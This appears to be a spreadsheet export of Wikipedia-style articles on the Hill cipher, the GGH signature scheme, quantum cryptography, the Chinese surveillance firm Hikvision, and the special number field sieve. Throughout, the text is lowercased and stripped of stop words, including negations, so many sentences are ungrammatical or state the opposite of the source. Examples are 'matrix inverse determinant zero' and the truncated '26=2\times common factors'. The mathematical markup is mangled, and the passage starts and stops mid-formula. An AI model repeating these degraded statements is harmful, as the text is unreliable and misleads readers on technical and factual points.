{\begin{pmatrix}8&amp;5&amp;10\\21&amp;8&amp;21\\21&amp;12&amp;8\end{pmatrix}}} taking previous example ciphertext 'poh', get: {\displaystyle {\begin{pmatrix}8&amp;5&amp;10\\21&amp;8&amp;21\\21&amp;12&amp;8\end{pmatrix}}{\begin{pmatrix}15\\14\\7\end{pmatrix}}={\begin{pmatrix}260\\574\\539\end{pmatrix}}\equiv {\begin{pmatrix}0\\2\\19\end{pmatrix}}{\pmod {26}}} gets back 'act', expected. complications exist picking encrypting matrix: matrices inverse. matrix inverse determinant zero. determinant encrypting matrix must common factors modular base.thus, work modulo above, determinant must nonzero, must divisible determinant common factors modular base, matrix cannot used hill cipher, another matrix must chosen (otherwise possible decrypt). fortunately, matrices satisfy conditions used hill cipher fairly common. example matrix: {\displaystyle {\begin{vmatrix}6&amp;24&amp;1\\13&amp;16&amp;10\\20&amp;17&amp;15\end{vmatrix}}=6(16\cdot 15-10\cdot 17)-24(13\cdot 15-10\cdot 20)+1(13\cdot 17-16\cdot 20)=441\equiv 25{\pmod {26}}} modulo determinant since {\displaystyle 25=5^{2}} {\displaystyle 26=2\times common factors matrix used hill cipher. risk determinant common factors modulus eliminated making modulus prime. consequently, useful variant hill cipher adds extra symbols (such space, period question mark) increase modulus example {\displaystyle k={\begin{pmatrix}3&amp;3\\2&amp;5\end{pmatrix}}} suppose plaintext message 'help'. then plaintext represented pairs {\displaystyle help\to {\begin{pmatrix}h\\e\end{pmatrix}},{\begin{pmatrix}l\\p\end{pmatrix}}\to {\begin{pmatrix}7\\4\end{pmatrix}},{\begin{pmatrix}11\\15\end{pmatrix}}} then compute {\displaystyle {\begin{pmatrix}3&amp;3\\2&amp;5\end{pmatrix}}{\begin{pmatrix}7\\4\end{pmatrix}}\equiv {\begin{pmatrix}7\\8\end{pmatrix}}{\pmod {26}},} {\displaystyle {\begin{pmatrix}3&amp;3\\2&amp;5\end{pmatrix}}{\begin{pmatrix}11\\15\end{pmatrix}}\equiv {\begin{pmatrix}0\\19\end{pmatrix}}{\pmod {26}}} continue encryption follows: {\displaystyle {\begin{pmatrix}7\\8\end{pmatrix}},{\begin{pmatrix}0\\19\end{pmatrix}}\to {\begin{pmatrix}h\\i\end{pmatrix}},{\begin{pmatrix}a\\t\end{pmatrix}}} matrix invertible, hence {\displaystyle k^{-1}} exists {\displaystyle kk^{-1}=k^{-1}k=i_{2}} inverse computed using formula {\displaystyle {\begin{pmatrix}a&amp;b\\c&amp;d\end{pmatrix}}^{-1}=(ad-bc)^{-1}{\begin{pmatrix}d&amp;-b\\-c&amp;a\end{pmatrix}}} this formula still holds modular reduction modular multiplicative inverse used compute {\displaystyle (ad-bc)^{-1}} hence case, compute {\displaystyle k^{-1}\equiv 9^{-1}{\begin{pmatrix}5&amp;23\\24&amp;3\end{pmatrix}}\equiv 3{\begin{pmatrix}5&amp;23\\24&amp;3\end{pmatrix}}\equiv {\begin{pmatrix}15&amp;17\\20&amp;9\end{pmatrix}}{\pmod {26}}} {\displaystyle hiat\to {\begin{pmatrix}h\\i\end{pmatrix}},{\begin{pmatrix}a\\t\end{pmatrix}}\to {\begin{pmatrix}7\\8\end{pmatrix}},{\begin{pmatrix}0\\19\end{pmatrix}}} then compute {\displaystyle {\begin{pmatrix}15&amp;17\\20&amp;9\end{pmatrix}}{\begin{pmatrix}7\\8\end{pmatrix}}={\begin{pmatrix}241\\212\end{pmatrix}}\equiv {\begin{pmatrix}7\\4\end{pmatrix}}{\pmod {26}},} {\displaystyle {\begin{pmatrix}15&amp;17\\20&amp;9\end{pmatrix}}{\begin{pmatrix}0\\19\end{pmatrix}}={\begin{pmatrix}323\\171\end{pmatrix}}\equiv {\begin{pmatrix}11\\15\end{pmatrix}}{\pmod {26}}} therefore, {\displaystyle {\begin{pmatrix}7\\4\end{pmatrix}},{\begin{pmatrix}11\\15\end{pmatrix}}\to {\begin{pmatrix}h\\e\end{pmatrix}},{\begin{pmatrix}l\\p\end{pmatrix}}\to help} security basic hill cipher vulnerable known-plaintext attack completely linear. opponent intercepts {\displaystyle n^{2}} plaintext/ciphertext character pairs linear system (usually) easily solved; happens system indeterminate, necessary plaintext/ciphertext pairs. calculating solution standard linear algebra algorithms takes little time. while matrix multiplication alone result secure cipher still useful step combined non-linear operations, matrix multiplication provide diffusion. example, appropriately chosen matrix guarantee small differences matrix multiplication result large differences matrix multiplication. indeed, modern ciphers matrix multiplication step provide diffusion. example, mixcolumns step matrix multiplication. function twofish combination non-linear s-boxes carefully chosen matrix multiplication (mds). space size space possible keys. space size number possible keys. effective size, number bits, binary logarithm space size. there {\displaystyle 26^{n^{2}}} matrices dimension thus {\displaystyle \log _{2}(26^{n^{2}})} {\displaystyle 4.7n^{2}} upper bound size hill cipher using matrices. this upper bound every matrix invertible thus usable key. number invertible matrices computed chinese remainder theorem. i.e., matrix invertible modulo invertible modulo modulo number invertible matrices modulo equal order general linear group gl(n,z2). {\displaystyle 2^{n^{2}}(1-1/2)(1-1/2^{2})\cdots (1-1/2^{n}).} equally, number invertible matrices modulo (i.e. order gl(n,z13)) {\displaystyle 13^{n^{2}}(1-1/13)(1-1/13^{2})\cdots (1-1/13^{n}).} number invertible matrices modulo product numbers. hence {\displaystyle 26^{n^{2}}(1-1/2)(1-1/2^{2})\cdots (1-1/2^{n})(1-1/13)(1-1/13^{2})\cdots (1-1/13^{n}).} additionally seems prudent avoid many zeroes matrix, since reduce diffusion. effect effective keyspace basic hill cipher 4.64 {\displaystyle 4.64n^{2}-1.7} hill cipher, bits. course, search efficient known attack. mechanical implementation when operating symbols once, hill cipher offers particular advantage playfair bifid cipher, fact weaker either, slightly laborious operate pencil-and-paper. dimension increases, cipher rapidly becomes infeasible human operate hand. hill cipher dimension implemented mechanically. hill partner awarded patent (u.s. patent 1,845,947) device, performed matrix multiplication modulo using system gears chains. unfortunately gearing arrangements (and thus key) fixed given machine, triple encryption recommended security: secret nonlinear step, followed wide diffusive step machine, followed third secret nonlinear step. (the much later even-mansour cipher also uses unkeyed diffusive middle step). such combination actually powerful 1929, indicates hill apparently understood concepts meet-in-the-middle attack well confusion diffusion. unfortunately, machine sell. also other practical "pencil-and-paper" polygraphic ciphers include: playfair cipher bifid cipher trifid cipher references lester hill, cryptography algebraic alphabet, american mathematical monthly vol.36, june–july 1929, 306–312. (pdf) lester hill, concerning certain linear transformation apparatus cryptography, american mathematical monthly vol.38, 1931, 135–154. jeffrey overbey, william traves, jerzy wojdylo, keyspace hill cipher, cryptologia, vol.29, no.1, january 2005, pp59–72. (citeseerx) (pdf) external links "hill cipher app" implements hill cipher shows matrices involved "hill cipher explained" illustrates linear algebra behind hill cipher "hill's cipher calculator" outlines hill cipher page</t>
  </si>
  <si>
    <t>GGH signature scheme</t>
  </si>
  <si>
    <t>goldreich-goldwasser-halevi (ggh) signature scheme digital signature scheme proposed 1995 published 1997, based solving closest vector problem (cvp) lattice. signer demonstrates knowledge good basis lattice using solve point representing message; verifier uses basis lattice verify signature consideration actually lattice point sufficiently close message point. idea developed detail original paper, focussed associated encryption algorithm. signatures form basis ntrusign signature algorithm. external links webpage original paper</t>
  </si>
  <si>
    <t>Quantum cryptography protocol</t>
  </si>
  <si>
    <t>Quantum cryptography</t>
  </si>
  <si>
    <t>quantum cryptography science exploiting quantum mechanical properties perform cryptographic tasks. best known example quantum cryptography quantum distribution offers information-theoretically secure solution exchange problem. advantage quantum cryptography lies fact allows completion various cryptographic tasks proven conjectured impossible using classical (i.e. non-quantum) communication. example, impossible copy data encoded quantum state. attempts read encoded data, quantum state changed wave function collapse (no-cloning theorem). this could used detect eavesdropping quantum distribution (qkd). history early 1970s, stephen wiesner, columbia university york, introduced concept quantum conjugate coding. seminal paper titled "conjugate coding" rejected ieee information theory society, eventually published 1983 sigact news. paper showed store transmit messages encoding "conjugate observables", linear circular polarization photons, either, both, received decoded. charles bennett, ibm's thomas watson research center gilles brassard 1979 20th ieee symposium foundations computer science, held puerto rico, discovered incorporate findings wiesner. "the main breakthrough came realized photons never meant store information, rather transmit 1984, building upon work bennett brassard proposed method secure communication, called bb84. independently, 1991 artur ekert proposed bell's inequalities achieve secure distribution. ekert's protocol distribution, subsequently shown dominic mayers andrew yao, offers device-independent quantum distribution. companies manufacture quantum cryptography systems include magiq technologies, inc. (boston, massachusetts, united states), quantique (geneva, switzerland), quintessencelabs (canberra, australia), toshiba (tokyo, japan), labs sequrenet (paris, france). advantages cryptography strongest link chain data security. however, interested parties cannot assume cryptographic keys remain secure indefinitely. quantum cryptography potential encrypt data longer periods classical cryptography. using classical cryptography, scientists cannot guarantee encryption beyond approximately years, stakeholders could longer periods protection. take, example, healthcare industry. 2017, 85.9% office-based physicians using electronic medical record systems store transmit patient data. under health insurance portability accountability act, medical records must kept secret. typically, paper medical records shredded period time, electronic records leave digital trace. quantum distribution protect electronic records periods years. also, quantum cryptography useful applications governments militaries historically, governments kept military data secret periods years. there also proof quantum distribution travel noisy channel long distance secure. reduced noisy quantum scheme classical noiseless scheme. this solved classical probability theory. this process consistent protection noisy channel possible implementation quantum repeaters. quantum repeaters ability resolve quantum communication errors efficient way. quantum repeaters, quantum computers, stationed segments noisy channel ensure security communication. quantum repeaters purifying segments channel connecting creating secure line communication. sub-par quantum repeaters provide efficient amount security noisy channel long distance. applications quantum cryptography general subject covers broad range cryptographic practices protocols. some notable applications protocols discussed below. quantum distribution best-known developed application quantum cryptography qkd, process using quantum communication establish shared parties (alice bob, example) without third party (eve) learning anything key, even eavesdrop communication alice bob. tries learn information established, discrepancies arise causing alice notice. once established, typically used encrypted communication using classical techniques. instance, exchanged could used symmetric cryptography (e.g. one-time pad). security quantum distribution proven mathematically without imposing restrictions abilities eavesdropper, something possible classical distribution. this usually described "unconditional security", although minimal assumptions required, including laws quantum mechanics apply alice able authenticate other, i.e. able impersonate alice otherwise man-in-the-middle attack would possible. while secure, practical application faces challenges. there fact limitations generation rate increasing transmission distances. recent studies allowed important advancements regard. 2018, protocol twin-field proposed mechanism overcome limits lossy communication. rate twin field protocol shown overcome secret key-agreement capacity lossy communication channel, known repeater-less plob bound, optical fiber; ideal rate surpasses bound already follows rate-loss scaling higher repeater-assisted secret key-agreement capacity (see figure figure details). protocol suggests optimal rates achievable "550 kilometers standard optical fibre", already commonly used communications today. theoretical result confirmed first experimental demonstration beyond plob bound characterized first effective quantum repeater. notable developments terms achieving high rates long distances sending-not-sending (sns) version tf-qkd protocol. no-phase-postselected twin-field scheme. mistrustful quantum cryptography mistrustful cryptography participating parties trust other. example, alice collaborate perform computation parties enter private inputs. alice trust trust alice. thus, secure implementation cryptographic task requires completing computation, alice guaranteed cheated guaranteed alice cheated either. examples tasks mistrustful cryptography commitment schemes secure computations, latter including examples coin flipping oblivious transfer. distribution belong area mistrustful cryptography. mistrustful quantum cryptography studies area mistrustful cryptography using quantum systems. contrast quantum distribution unconditional security achieved based laws quantum physics, case various tasks mistrustful cryptography no-go theorems showing impossible achieve unconditionally secure protocols based laws quantum physics. however, tasks implemented unconditional security protocols exploit quantum mechanics also special relativity. example, unconditionally secure quantum commitment shown impossible mayers chau. unconditionally secure ideal quantum coin flipping shown impossible chau. moreover, showed cannot unconditionally secure quantum protocols one-out-of-two oblivious transfer secure two-party computations. however, unconditionally secure relativistic protocols coin flipping bit-commitment shown kent. quantum coin flipping unlike quantum distribution, quantum coin flipping protocol used participants trust other. participants communicate quantum channel exchange information transmission qubits. alice trust other, expects cheat. therefore, effort must spent ensuring neither alice gain significant advantage produce desired outcome. ability influence particular outcome referred bias, significant focus developing protocols reduce bias dishonest player, otherwise known cheating. quantum communication protocols, including quantum coin flipping, shown provide significant security advantages classical communication, though considered difficult realize practical world.a coin flip protocol generally occurs like this: alice chooses basis (either rectilinear diagonal) generates string photons send basis. randomly chooses measure photon rectilinear diagonal basis, noting basis used measured value. publicly guesses basis alice used send qubits. alice announces basis used sends original string bob. confirms comparing alice's string table. perfectly correlated values measured using alice's basis completely uncorrelated opposite.cheating occurs player attempts influence, increase probability particular outcome. protocol discourages forms cheating; example, alice could cheat step claiming incorrectly guessed initial basis guessed correctly, alice would need generate string qubits perfectly correlates measured opposite table. chance generating matching string qubits decrease exponentially number qubits sent, notes mismatch, know lying. alice could also generate string photons using mixture states, would easily string correlate partially (but fully) sides table, know cheated process. there also inherent flaw comes current quantum devices. errors lost qubits affect bob's measurements, resulting holes bob's measurement table. significant losses measurement affect bob's ability verify alice's qubit sequence step theoretically surefire alice cheat utilize einstein-podolsky-rosen (epr) paradox. photons pair anticorrelated; always found opposite polarizations, provided measured basis. alice could generate string pairs, sending photon pair storing herself. when states guess, could measure pair photons opposite basis obtain perfect correlation bob's opposite table. would never know cheated. however, requires capabilities quantum technology currently possess, making impossible practice. successfully execute this, alice would need able store photons significant amount time well measure near perfect efficiency. this photon lost storage measurement would result hole string would fill guessing. guesses make, risks detection cheating. quantum commitment addition quantum coin-flipping, quantum commitment protocols implemented distrustful parties involved. commitment scheme allows party alice certain value "commit") alice cannot change value time ensuring recipient cannot learn anything value alice reveals such commitment schemes commonly used cryptographic protocols (e.g. quantum coin flipping, zero-knowledge proof, secure two-party computation, oblivious transfer). quantum setting, would particularly useful: crépeau kilian showed commitment quantum channel, construct unconditionally secure protocol performing so-called oblivious transfer. oblivious transfer, hand, shown kilian allow implementation almost distributed computation secure (so-called secure multi-party computation). (notice imprecise: results crépeau kilian together directly imply given commitment quantum channel perform secure multi-party computation. this results guarantee "composability", plugging together, might lose security. unfortunately, early quantum commitment protocols shown flawed. fact, mayers showed (unconditionally secure) quantum commitment impossible: computationally unlimited attacker break quantum commitment protocol.yet, result mayers preclude possibility constructing quantum commitment protocols (and thus secure multi-party computation protocols) assumptions much weaker assumptions needed commitment protocols quantum communication. bounded quantum storage model described example setting quantum communication used construct commitment protocols. breakthrough november 2013 offers "unconditional" security information harnessing quantum theory relativity, successfully demonstrated global scale first time. more recently, wang al., proposed another commitment scheme "unconditional hiding" perfect.physical unclonable functions also exploited construction cryptographic commitments. bounded- noisy-quantum-storage model possibility construct unconditionally secure quantum commitment quantum oblivious transfer (ot) protocols bounded quantum storage model (bqsm). model, assumed amount quantum data adversary store limited known constant however, limit imposed amount classical (i.e., non-quantum) data adversary store. bqsm, construct commitment oblivious transfer protocols. underlying idea following: protocol parties exchange quantum bits (qubits). since even dishonest party cannot store information (the quantum memory adversary limited qubits), large part data either measured discarded. forcing dishonest parties measure large part data allows protocol circumvent impossibility result, commitment oblivious transfer protocols implemented.the protocols bqsm presented damgård, fehr, salvail, schaffner assume honest protocol participants store quantum information; technical requirements similar quantum distribution protocols. these protocols thus, least principle, realized today's technology. communication complexity constant factor larger bound adversary's quantum memory. advantage bqsm assumption adversary's quantum memory limited quite realistic. with today's technology, storing even single qubit reliably sufficiently long time difficult. (what "sufficiently long" means depends protocol details. introducing artificial pause protocol, amount time adversary needs store quantum data made arbitrarily large.) extension bqsm noisy-storage model introduced wehner, schaffner terhal. instead considering upper bound physical size adversary's quantum memory, adversary allowed imperfect quantum storage devices arbitrary size. level imperfection modelled noisy quantum channels. high enough noise levels, primitives bqsm achieved bqsm forms special case noisy-storage model. classical setting, similar results achieved assuming bound amount classical (non-quantum) data adversary store. proven, however, model also honest parties large amount memory (namely square-root adversary's memory bound). this makes protocols impractical realistic memory bounds. (note today's technology hard disks, adversary cheaply store large amounts classical data.) position-based quantum cryptography goal position-based quantum cryptography geographical location player (only) credential. example, wants send message player specified position guarantee read receiving party located particular position. basic task position-verification, player, alice, wants convince (honest) verifiers located particular point. shown chandran position-verification using classical protocols impossible colluding adversaries (who control positions except prover's claimed position). under various restrictions adversaries, schemes possible. under name 'quantum tagging', first position-based quantum schemes investigated 2002 kent. us-patent granted 2006. notion using quantum effects location verification first appeared scientific literature 2010. after several quantum protocols position verification suggested 2010, buhrman claimed general impossibility result: using enormous amount quantum entanglement (they doubly exponential number pairs, number qubits honest player operates on), colluding adversaries always able make look verifiers claimed position. however, result exclude possibility practical schemes bounded- noisy-quantum-storage model (see above). later beigi könig improved amount pairs needed general attack position-verification protocols exponential. they also showed particular protocol remains secure adversaries controls linear amount pairs. argued time-energy coupling possibility formal unconditional location verification quantum effects remains open problem. worth mentioning study position-based quantum cryptography also connections protocol port-based quantum teleportation, advanced version quantum teleportation, many pairs simultaneously used ports. device-independent quantum cryptography quantum cryptographic protocol device-independent security rely trusting quantum devices used truthful. thus security analysis protocol needs consider scenarios imperfect even malicious devices. mayers proposed idea designing quantum protocols using "self-testing" quantum apparatus, internal operations uniquely determined input-output statistics. subsequently, roger colbeck thesis proposed bell tests checking honesty devices. since then, several problems shown admit unconditional secure device-independent protocols, even actual devices performing bell test substantially "noisy," i.e., ideal. these problems include quantum distribution, randomness expansion, randomness amplification.in 2018, theoretical studies performed arnon- friedman suggest exploiting property entropy later referred "entropy accumulation theorem (eat)" extension asymptotic equipartition property, guarantee security device independent protocol. post-quantum cryptography quantum computers become technological reality; therefore important study cryptographic schemes used adversaries access quantum computer. study schemes often referred post-quantum cryptography. need post-quantum cryptography arises fact many popular encryption signature schemes (schemes based rsa) broken using shor's algorithm factoring computing discrete logarithms quantum computer. examples schemes are, today's knowledge, secure quantum adversaries mceliece lattice-based schemes, well symmetric-key algorithms. surveys post-quantum cryptography available.there also research existing cryptographic techniques modified able cope quantum adversaries. example, trying develop zero-knowledge proof systems secure quantum adversaries, techniques need used: classical setting, analysis zero-knowledge proof system usually involves "rewinding", technique makes necessary copy internal state adversary. quantum setting, copying state always possible (no-cloning theorem); variant rewinding technique used.post quantum algorithms also called "quantum resistant", unlike quantum distribution known provable potential future quantum attacks them. even though possibly vulnerable quantum attacks future, announcing plans transition quantum resistant algorithms. national institute standards technology (nist) believes time think quantum-safe primitives. quantum cryptography beyond distribution far, quantum cryptography mainly identified development quantum distribution protocols. unfortunately, symmetric cryptosystems keys distributed means quantum distribution become inefficient large networks (many users), necessity establishment manipulation many pairwise secret keys (the so-called "key-management problem"). moreover, distribution alone address many cryptographic tasks functions, vital importance everyday life. kak's three-stage protocol proposed method secure communication entirely quantum unlike quantum distribution, cryptographic transformation uses classical algorithmsbesides quantum commitment oblivious transfer (discussed above), research quantum cryptography beyond distribution revolves around quantum message authentication, quantum digital signatures, quantum one-way functions public-key encryption, quantum fingerprinting entity authentication (for example, quantum readout pufs), etc. y-00 protocol yuen presented y-00 stream cipher using quantum noise around 2000 applied u.s. defense advanced research projects agency darpa high-speed high-capacity quantum cryptography project alternative quantum distribution. review paper summarizes well. unlike quantum distribution protocols, main purpose y-00 transmit message without eavesdrop monitoring, distribute key. therefore, privacy amplification used distributions, described below. currently, research conducted mainly japan china. principle operation follows. first, legitimate users share change pseudo-random keystream using pseudo-random number generator. then, legitimate parties perform conventional optical communications based shared (advantage creation) transforming appropriately. attackers share key, wire-tap channel model aaron wyner implemented, goal achieve longer covert communication information-theoretic security limit (one-time pad) shannon. source noise wire-tap channel uncertainty principle electromagnetic field itself, theoretical consequence laser light theory glauber george sudarshan (coherent state). therefore, existing technology sufficient implementation. furthermore, since uses ordinary communication laser light, compatible existing communication infrastructure used high-speed long-distance communication routing. although main purpose transmit message, distribution possible simply replacing message key. since symmetric cipher, must share initial previously; however, method initial agreement also proposed. hand, currently unclear implementation realizes information-theoretic security, security long matter debate. implementation practice theory, quantum cryptography seems successful turning point information security sector. however, cryptographic method ever absolutely secure. practice, quantum cryptography conditionally secure, dependent assumptions. single-photon source assumption theoretical basis quantum distribution assumes single-photon sources. however, sources difficult construct, real-world quantum cryptography systems faint laser sources medium information transfer. these multi-photon sources open possibility eavesdropper attacks, particularly photon splitting attack. eavesdropper, eve, split multi-photon source retain copy herself. photons transmitted without measurement trace captured copy data. scientists believe retain security multi-photon source using decoy states test presence eavesdropper. however, 2016, scientists developed near perfect single photon source estimate could developed near future. identical detector efficiency assumption practice, multiple single-photon detectors used quantum distribution devices, alice bob. these photodetectors tuned detect incoming photon short window nanoseconds. manufacturing differences detectors, respective detection windows shifted finite amount. eavesdropper, eve, take advantage detector inefficiency measuring alice's qubit sending "fake state" bob. first captures photon sent alice generates another photon send bob. manipulates phase timing "faked" photon prevents detecting presence eavesdropper. eliminate vulnerability eliminate differences photodetector efficiency, difficult given finite manufacturing tolerances cause optical path length differences, wire length differences, defects. deprecation quantum distributions governmental institutions some organizations recommended using "post-quantum cryptography quantum-resistant cryptography)" alternative problems raises practical use. example, national security agency usa, european union agency cybersecurity (enisa), national cyber security centre (united kingdom), french secretariat defense security (anssi) recommend (read bibliography details).for example, u.s. national security agency addresses five issues: quantum distribution partial solution. generates keying material encryption algorithm provides confidentiality. such keying material could also used symmetric cryptographic algorithms provide integrity authentication cryptographic assurance original transmission comes desired entity (i.e. entity source authentication). provide means authenticate transmission source. therefore, source authentication requires asymmetric cryptography preplaced keys provide authentication. moreover, confidentiality services offers provided quantum-resistant cryptography, typically less expensive better understood risk profile. quantum distribution requires special purpose equipment. based physical properties, security derives unique physical layer communications. this requires users lease dedicated fiber connections physically manage free-space transmitters. cannot implemented software service network, cannot easily integrated existing network equipment. since hardware-based also lacks flexibility upgrades security patches. quantum distribution increases infrastructure costs insider threat risks. networks frequently necessitate trusted relays, entailing additional cost secure facilities additional security risk insider threats. this eliminates many cases consideration. securing validating quantum distribution significant challenge. actual security provided system theoretical unconditional security laws physics modeled often suggested), rather limited security achieved hardware engineering designs. tolerance error cryptographic security, however, many orders magnitude smaller physical engineering scenarios making difficult validate. specific hardware used perform introduce vulnerabilities, resulting several well-publicized attacks commercial systems. quantum distribution increases risk denial service. sensitivity eavesdropper theoretical basis security claims also shows denial service significant risk qkd.in response problem above, attempts deliver authentication keys using post-quantum cryptography quantum-resistant cryptography) proposed worldwide. hand, quantum-resistant cryptography cryptography belonging class computational security. 2015, research result already published "sufficient care must taken implementation achieve information-theoretic security system whole authentication keys information-theoretic secure used" (when authentication information-theoretic secure authentication information-theoretically secure, attacker break bring classical quantum communications control relay launch man-in-the-middle attack). ericsson, private company, also cites points problems presents report able support zero trust security model, recent trend network security technology. references</t>
  </si>
  <si>
    <t>Hikvision</t>
  </si>
  <si>
    <t>hangzhou hikvision digital technology co., ltd., often shortened hikvision, chinese state-owned manufacturer supplier video surveillance equipment civilian military purposes, headquartered hangzhou, zhejiang. controlling shares owned chinese government. involvement alleged human rights violation national security concerns, company placed sanctions u.s. european governments prevented receiving government contracts. history hikvision founded 2001 zhejiang information technology co., ltd. (chinese: 浙江海康信息技术股份有限公司) company stake gong hongjia (龚虹嘉) stake time. hikvision solution provider video surveillance market core competency. devotes annual revenue research development 40,403 employees.hikvision listed shenzhen stock exchange since 2010. company provides surveillance products global market. october 2016, company concluded deal movidius' computer vision technology.in 2017, hikvision established hikstorage, subsidiary focused production storage devices.in january 2021, company us$33 million, 1,900-camera smart city project shanghe county, shandong includes cameras facial recognition license plate recognition technologies.in 2021, best buy, home depot, lowe's stopped selling cameras hikvision brand ezviz concerns hikvision's complicity surveillance human rights violations xinjiang.in 2022, hikvision awarded chinese government contract develop software track "key people" order prevent entering beijing. u.s. investment prohibition november 2020, u.s. president donald trump issued executive order prohibiting american company individual owning shares companies united states department defense listed links people's liberation army, included hikvision. december 2020, hikvision removed ftse russell.on january 2021, biden inaugural committee returned $500 donation former u.s. senator barbara boxer (d-ca) registered foreign agent hikvision.in march 2021, federal communications commission declared hikvision services equipment "pose unacceptable risk u.s. national security." market june 2019, hikvision ranked 800th 2019 edition forbes global 2000. november 2016, hikvision also constituent szse index, blue chip index shenzhen stock exchange, well pan-china indexes index, ftse china index hang seng china index. ownership december 2017 hikvision owned china electronics technology group co., ltd. (hik group, 中电海康集团有限公司), wholly owned subsidiary china electronics technology group, 39.59% stake.: china electronics technology group state-run enterprise owned supervised state-owned assets supervision administration commission state council. china electronics technology group holds additional 1.96% stake hikvision 52nd research institute (中国电子科技集团公司第五十二研究所).: chairman hikvision, chen zongnian (陈宗年), also chairman party committee secretary group, head aforementioned research institute.: november 2019 firm's largest individual shareholder vice-chairman gong hongjia stake. 2019 fidelity international also major investor hikvision.in 2017, third largest shareholder private equity fund (新疆威讯投资管理有限合伙企业; xīnjiāng wēixùn) stake,: associated hikvision general manager yangzhong.: according previous filing, "xinjian weixun" also associated xiang (刘翔),: former director (from 2015 march 2018) former deputy general manager hikvision, deputy general manager group, chairman sister listed company phenix optical.: 2017, fourth largest shareholder another private equity fund (新普康投资有限合伙企业) stake.: fund partly owned gong's wife chen chunmei (陈春梅) aforementioned yangzhong.: yangzhong also owned additional 1.33% stake personally.: shareholders owned combined 65.71% stake. lastly, hong kong securities clearing company owned 9.77%,: nominees shanghai-hong kong stock connect shenzhen-hong kong stock connect. 2021, ipvm alleged hikvision created controlled chinese government. alleged attempts conceal government ownership 2015, ipvm criticized hikvision allegedly obscuring chinese government ownership. jeffrey president hikvision north america, criticized online blogger site allegedly seeking financial gain.alan west, 2016 interview published times (and re-published australian), suggested hikvision's ownership raised ethical security concerns came usage hikvision's products british government. controversies cybersecurity vulnerabilities 2017, seven series hikvision cameras affected improper authentication vulnerability which, exploited, could allow malicious attacker [to] escalat[e] privileges assum[e] identity authenticated user [obtain] sensitive data," according u.s. cybersecurity infrastructure security agency.in 2021, italian public broadcaster reported hikvision cameras automatically "opened communication channels addresses registered china" connected internet. hikvision declined comment investigation.in september 2021, hikvision announced command injection vulnerability cve-id cve-2021-36260. forbes reported vulnerability, cvss base score left dozens hikvision camera models "susceptible remote hijacking" without requiring username password.in 2022, axios reported hikvision hired consulting conduct cybersecurity audits products. involvement xinjiang internment camps january 2019, u.s. government began considering whether sanction hikvision, american government officials described "provided thousands cameras monitor mosques, schools, concentration camps xinjiang."the u.s. government banned hikvision receiving federal government contracts august 2019 security concerns. october 2019, hikvision formally placed entity list u.s. government role surveillance uyghurs xinjiang ethnic religious minorities china. hikvision expressed opposition decision stated believe decision factual basis. they urged u.s. government re-examine decision.in response bans sanctions, hikvision hired former u.s. ambassador pierre-richard prosper advise company regarding human rights compliance" well numerous lobbyists, including former u.s. senators david vitter barbara boxer, former u.s. congressman toby moffett, former senior ofac official.in april 2021, european parliament confirmed removed hikvision thermal cameras premises following approval amendment sponsored dutch lara wolters calling removal "all hikvision’s thermal cameras parliament’s premises" unacceptable risk hikvision, operations xinjiang, contributing serious human rights abuses."in july 2021, foreign affairs select committee published report stating hikvision cameras "have deployed throughout xinjiang, provide primary camera technology used internment camps".in june 2022, documents xinjiang police files showed hikvision technology used xinjiang police surveil xinjiang residents. bans january 2021, united states america banned government installations information communication equipment brands based people's republic china, including hikvision, particular concern government agencies.in june 2021, hikvision products banned year south korea's ministry science forged test reports.in september 2021, indian navy's headquarters "asked formations 'discontinue' procurement cctv cameras surveillance systems hikvision," according week. week also reported indian navy ordered replacement destruction existing hikvision cameras.in april 2022, department health social care banned purchase hikvision cameras. notes references</t>
  </si>
  <si>
    <t>Special number field sieve</t>
  </si>
  <si>
    <t>number theory, branch mathematics, special number field sieve (snfs) special-purpose integer factorization algorithm. general number field sieve (gnfs) derived special number field sieve efficient integers form small (for instance mersenne numbers). heuristically, complexity factoring integer {\displaystyle form: {\displaystyle \exp \left(\left(1+o(1)\right)\left({\tfrac {32}{9}}\log n\right)^{1/3}\left(\log \log n\right)^{2/3}\right)=l_{n}\left[1/3,(32/9)^{1/3}\right]} l-notations. snfs used extensively nfsnet volunteer distributed computing effort), nfs@home others factorise numbers cunningham project; time records integer factorization numbers factored snfs. overview method snfs based idea similar much simpler rational sieve; particular, readers find helpful read rational sieve first, tackling snfs. snfs works follows. integer want factor. rational sieve, snfs broken steps: first, find large number multiplicative relations among factor base elements z/nz, number multiplicative relations larger number elements factor base. second, multiply together subsets relations exponents even, resulting congruences form a2≡b2 (mod these turn immediately lead factorizations n=gcd(a+b,n)×gcd(a-b,n). done right, almost certain least factorization nontrivial.the second step identical case rational sieve, straightforward linear algebra problem. first step, however, done different, efficient rational sieve, utilizing number fields. details method integer want factor. pick irreducible polynomial integer coefficients, integer f(m)≡0 (mod explain chosen next section). root form ring z[α]. there unique ring homomorphism z[α] z/nz maps simplicity, we'll assume z[α] unique factorization domain; algorithm modified work isn't, additional complications. next, parallel factor bases, z[α] z[α] consists prime ideals z[α] whose norm bounded chosen value {\displaystyle n_{\max factor base rational sieve case, consists prime integers bound. search relatively prime pairs integers (a,b) that: a+bm smooth respect factor base (i.e., product elements factor base). a+bα smooth respect factor base z[α]; given chose factor base, equivalent norm a+bα divisible primes less {\displaystyle n_{\max .these pairs found sieving process, analogous sieve eratosthenes; motivates name "number field sieve". pair, apply ring homomorphism factorization a+bα, apply canonical ring homomorphism z/nz factorization a+bm. setting equal gives multiplicative relation among elements bigger factor base z/nz, find enough pairs proceed combine relations factor described above. choice parameters every number appropriate choice snfs: need know advance polynomial appropriate degree (the optimal degree conjectured {\displaystyle \left(3{\frac {\log n}{\log \log n}}\right)^{\frac {1}{3}}} sizes currently feasible factorise) small coefficients, value {\displaystyle f(x)\equiv 0{\pmod {n}}} number factorise. there extra condition: must satisfy {\displaystyle ax+b\equiv 0{\pmod {n}}} bigger {\displaystyle n^{1/d}} numbers polynomials exist {\displaystyle a^{b}\pm numbers cunningham tables; example, nfsnet factored {\displaystyle 3^{479}+1} used polynomial {\displaystyle x^{6}+3} {\displaystyle x=3^{80}} since {\displaystyle (3^{80})^{6}+3=3^{480}+3} {\displaystyle 3^{480}+3\equiv 0{\pmod {3^{479}+1}}} numbers defined linear recurrences, fibonacci lucas numbers, also snfs polynomials, little difficult construct. example, {\displaystyle f_{709}} polynomial {\displaystyle n^{5}+10n^{3}+10n^{2}+10n+3} value satisfies {\displaystyle f_{142}x-f_{141}=0} already know factors large snfs-number, snfs calculation modulo remaining part; nfsnet example above, 158071 7167757 7759574882776161031 {\displaystyle 